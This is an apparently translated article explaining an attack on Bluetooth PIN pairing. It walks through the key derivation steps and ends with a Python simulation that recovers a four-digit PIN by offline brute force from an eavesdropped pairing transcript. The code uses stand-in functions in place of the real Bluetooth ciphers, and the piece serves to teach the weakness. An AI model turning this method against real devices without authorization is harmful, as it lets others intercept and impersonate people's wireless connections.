Note: this article discusses only the latest published attack technique against the Bluetooth PIN code, so that everyone can take precautions; it has no other purpose. No one may use the technique described here for anything illegal.
Recently a number of domestic and foreign websites published news of a new attack on the Bluetooth PIN code: by forcing two Bluetooth devices that are already communicating to re-pair, and recording the pairing exchange, an attacker can recover a four-digit (decimal) PIN in about 0.063 seconds. The World Wireless Technology Conference held in early June this year also discussed the attack in detail. SecurityFocus went so far as to say that the technique "has shocked many information security experts who follow wireless technology, because earlier work on Bluetooth PIN attacks only covered incorrect Bluetooth configurations or special environments; this is the first comprehensive description of the attack". WDA, which gives equal attention to entertainment and technology, follows up on this Bluetooth attack and works through the details below, in the hope of discussing them with readers interested in Bluetooth technology.
I. Overview
Bluetooth is a protocol for short-range wireless connections between multiple devices. It is widely used in wireless peripherals, imaging, security products, consumer entertainment, automotive products, household appliances and other fields. As a wireless technology, Bluetooth provides security mechanisms such as key management, authentication and confidentiality. In the past few years, however, several attacks on Bluetooth have been proposed, including information leakage, data theft and impersonation. The security problems of Bluetooth include the following:
1. The security of the whole Bluetooth pairing system rests on the secrecy of the PIN. Because of low security awareness, users usually choose short PINs, which greatly increases the chance that the PIN can be found by exhaustive search.
2. The cryptographic algorithms used by the Bluetooth protocol were designed specifically for Bluetooth by its designers. From a cryptanalytic standpoint, an algorithm earns trust only after long public scrutiny; a new algorithm that has not had this testing may contain flaws.
3. Bluetooth is intended for short-range communication, within about 10 meters, so an attacker has to get close to the target. On a busy pedestrian street or in a crowded venue, however, an attacker need only switch on a Bluetooth device and search for Bluetooth communication within 10 meters. In addition, the range at which Bluetooth traffic can be received can be extended cheaply with off-the-shelf radio hardware such as the high-gain antennas sold for IEEE 802.11 equipment, which operates in the same 2.4 GHz band.
4. As Bluetooth becomes more popular, and especially now that Bluetooth software can be installed on PDAs and portable computers, the information stored on those PDAs and portable computers attracts more and more interest from attackers.
II. Glossary
Pairing: the process by which two Bluetooth devices verify each other when they communicate for the first time. Once paired, later connections between the two devices do not have to be confirmed again, which is convenient.
PIN (personal identification number): the Bluetooth PIN is 1 to 16 bytes (up to 128 bits) long. In practice users enter a short decimal code, typically four digits.
BD_ADDR: the Bluetooth device address. Every Bluetooth transceiver is assigned a unique 48-bit device address, similar to the MAC address of a PC network card. The two devices learn each other's BD_ADDR through the inquiry procedure at the start of communication; because the address is sent in the clear, an eavesdropper within radio range learns it as well.
III. Bluetooth pairing and authentication process
Bluetooth supports three security modes. Mode 1 is the non-secure mode, in which the device applies no security measures. Mode 2 is service-level enforced security, in which no security procedure is started before the channel is established. Mode 3 is link-level enforced security, in which the device runs the security procedures before the link is established. Of the three, link-level security is the strongest, and it is the mode the attack discussed in this article targets.
1. Pairing and authentication
Bluetooth link setup involves three steps: generating an initialization key (K_init), generating a link key (K_AB), and mutual authentication. An encryption key derived afterwards protects the subsequent traffic. Before pairing, the PIN must be entered on both devices; on some devices (such as wireless headsets) the PIN is fixed and cannot be changed. The PINs on the two sides must match, otherwise the pairing fails. The details of pairing and mutual authentication follow.
a. Generating the initialization key (K_init)
The initialization key K_init is 128 bits long and is produced by the E22 algorithm; Figure 1 shows the process. The device that initiates the connection is called the master and is denoted A; the device that responds is called the slave and is denoted B. As the figure shows, the input to E22 consists of three parts:
1) BD_ADDR_B, the physical address of the slave device.
2) The PIN and its length L (in bytes). The PIN has been entered on both devices in advance.
3) IN_RAND, a 128-bit random number generated by the master and sent to the slave in plaintext.
Because both devices run the same E22 algorithm, they arrive at the same K_init whenever the three inputs are equal on both sides. Note that of these inputs only the PIN is secret: BD_ADDR_B and IN_RAND are both observable over the air.
b. Generating the link key (K_AB)
Figure 2 shows the process. First, master A generates a 128-bit random number LK_RAND_A, and slave B generates a 128-bit random number LK_RAND_B. A XORs K_init with LK_RAND_A bitwise and sends the result to B; B likewise XORs K_init with LK_RAND_B and sends the result to A. Since each side knows K_init, it strips it off to recover the other side's random number, so after this exchange A and B both hold K_init, LK_RAND_A and LK_RAND_B. Each device then runs E21 twice, on (LK_RAND_A, BD_ADDR_A) and on (LK_RAND_B, BD_ADDR_B), and XORs the two results to obtain the link key K_AB.
Figure 2
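The pairing exchange above (K_init, the two masked LK_RAND values, K_AB) together with the mutual-authentication step named in step 1, written out as an added example; it is not code from the original article. The real E21, E22 and E1 are SAFER+-based functions from the Bluetooth specification and are not implemented here: the code substitutes truncated HMAC-SHA256 stand-ins (an assumption made for illustration), encodes a decimal PIN as its ASCII digits, and uses constructed device addresses. What the example shows faithfully is which values cross the air in the clear, and how a passive listener holding those values can test PIN guesses offline against the recorded authentication response.

```python
import hashlib
import hmac
import os


# Stand-ins for the Bluetooth E22 / E21 / E1 functions. Assumption: the real
# ones are SAFER+-based; these HMAC-SHA256 constructions only mirror their
# inputs and output sizes.
def _prf(label: bytes, *parts: bytes) -> bytes:
    mac = hmac.new(label, digestmod=hashlib.sha256)
    for p in parts:
        mac.update(len(p).to_bytes(2, "big") + p)  # length-prefixed fields
    return mac.digest()[:16]                        # 128-bit output


def e22(bd_addr: bytes, pin: bytes, in_rand: bytes) -> bytes:
    """K_init = E22(BD_ADDR, PIN, L, IN_RAND); L is the PIN length in bytes."""
    return _prf(b"E22", bd_addr, pin, bytes([len(pin)]), in_rand)


def e21(lk_rand: bytes, bd_addr: bytes) -> bytes:
    """One device's contribution to the link key."""
    return _prf(b"E21", lk_rand, bd_addr)


def e1(link_key: bytes, au_rand: bytes, bd_addr: bytes) -> bytes:
    """Authentication response SRES (32 bits) to the challenge AU_RAND."""
    return _prf(b"E1", link_key, au_rand, bd_addr)[:4]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pair(pin: bytes, bd_addr_a: bytes, bd_addr_b: bytes, rng=os.urandom):
    """Run pairing between master A and slave B.

    Returns the link key K_AB both sides derive, plus the transcript of
    everything an eavesdropper within radio range can record.
    """
    in_rand = rng(16)                              # A -> B, plaintext
    k_init = e22(bd_addr_b, pin, in_rand)          # computed on both sides

    lk_rand_a, lk_rand_b = rng(16), rng(16)        # private to A and B
    c_a = xor(k_init, lk_rand_a)                   # A -> B
    c_b = xor(k_init, lk_rand_b)                   # B -> A
    # Each side strips K_init to recover the other side's random number.
    assert xor(c_a, k_init) == lk_rand_a and xor(c_b, k_init) == lk_rand_b

    k_ab = xor(e21(lk_rand_a, bd_addr_a), e21(lk_rand_b, bd_addr_b))

    # Mutual authentication, one direction shown: A challenges B.
    au_rand = rng(16)                              # A -> B, plaintext
    sres = e1(k_ab, au_rand, bd_addr_b)            # B -> A, plaintext

    transcript = dict(bd_addr_a=bd_addr_a, bd_addr_b=bd_addr_b,
                      in_rand=in_rand, c_a=c_a, c_b=c_b,
                      au_rand=au_rand, sres=sres)
    return k_ab, transcript


def recover_link_key(t: dict, pin_guess: bytes) -> bytes:
    """What a passive listener computes from the transcript for one PIN guess."""
    k_init = e22(t["bd_addr_b"], pin_guess, t["in_rand"])
    lk_rand_a = xor(t["c_a"], k_init)
    lk_rand_b = xor(t["c_b"], k_init)
    return xor(e21(lk_rand_a, t["bd_addr_a"]), e21(lk_rand_b, t["bd_addr_b"]))


def crack_pin(t: dict, digits: int = 4):
    """Offline exhaustive search over all decimal PINs of the given length,
    using the recorded (AU_RAND, SRES) pair as the verification oracle."""
    for n in range(10 ** digits):
        guess = str(n).zfill(digits).encode()
        k_ab = recover_link_key(t, guess)
        if e1(k_ab, t["au_rand"], t["bd_addr_b"]) == t["sres"]:
            return guess.decode()
    return None


if __name__ == "__main__":
    # Constructed sample addresses and PIN for the demonstration.
    addr_a = bytes.fromhex("001122334455")
    addr_b = bytes.fromhex("66778899aabb")
    k_ab, transcript = pair(b"1234", addr_a, addr_b)
    print("recovered PIN:", crack_pin(transcript))
    print("link key matches:", recover_link_key(transcript, b"1234") == k_ab)
```

Nothing in the transcript is secret except what the PIN contributes, so the only work the listener has to do is run the key derivation once per candidate PIN and compare against the recorded SRES; with four decimal digits that is 10,000 candidates. A real attacker does not know the PIN length in advance and would repeat the search for each plausible length, and would also check the other direction of the authentication exchange to rule out a chance 32-bit collision.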